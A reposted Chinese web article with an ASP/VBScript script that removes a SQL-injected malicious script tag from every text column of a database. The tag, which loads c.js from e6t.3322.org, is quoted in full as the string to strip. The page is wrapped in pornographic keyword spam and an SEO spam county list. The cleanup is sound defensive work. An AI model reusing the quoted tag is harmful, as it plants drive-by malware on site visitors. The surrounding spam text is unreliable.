国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數據庫 > 文庫 > 正文

恢復 SQL 被注入后的數據代碼

2020-10-29 21:54:47
字體:
來源:轉載
供稿:網友
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!--#include file="Inc/conn.asp"-->
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<%
server.ScriptTimeout = 1000000
'xtype=99 ntext 與text類型相似,不同的是,ntext類型采用unicode標準字符集。
'xtype=35 text 用于存儲大量文本數據。
'xtype=231 nvarchar 用來定義可變長度的二進制數據,最大長度為4000個字符。
'xtype=167 varchar 存儲最常可以達到8000個字符的變長的字符數據
str = "'<script src="http://e6t.3322.org/c.js" src="http://e6t.3322.org/c.js"></script>'" '加在文本類型字段后的木馬代碼
sql = "SELECT a.name as t_name,b.name as c_name, b.xtype FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)"
set rs = conn.execute(sql)
while Not rs.eof
t_name = rs("t_name") '表名
c_name = rs("c_name") '字段名
xtype = rs("xtype") '字段類型
If (xtype = 99 Or xtype = 35) then
conn.execute("update [" + t_name + "] set [" + c_name + "]=replace(cast([" + c_name + "] as varchar(8000)), " + str + ", '')")
Else
conn.execute("update [" + t_name + "] set [" + c_name + "]=replace([" + c_name + "], " + str + ", '')")
End If
rs.movenext
wend
response.Write("已經初步清理了掛馬數據,請重新刷新頁面試試看!")
%>
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 外汇| 朔州市| 炉霍县| 光泽县| 宁都县| 泾阳县| 江山市| 布尔津县| 正安县| 车险| 云霄县| 嘉祥县| 阳山县| 中山市| 德清县| 开原市| 石楼县| 门头沟区| 邢台县| 曲松县| 年辖:市辖区| 石屏县| 鲁山县| 沁源县| 宜阳县| 隆子县| 石渠县| 香格里拉县| 定远县| 梁平县| 横山县| 顺平县| 蓝田县| 北辰区| 师宗县| 微山县| 忻城县| 诏安县| 自贡市| 遵义市| 东港市|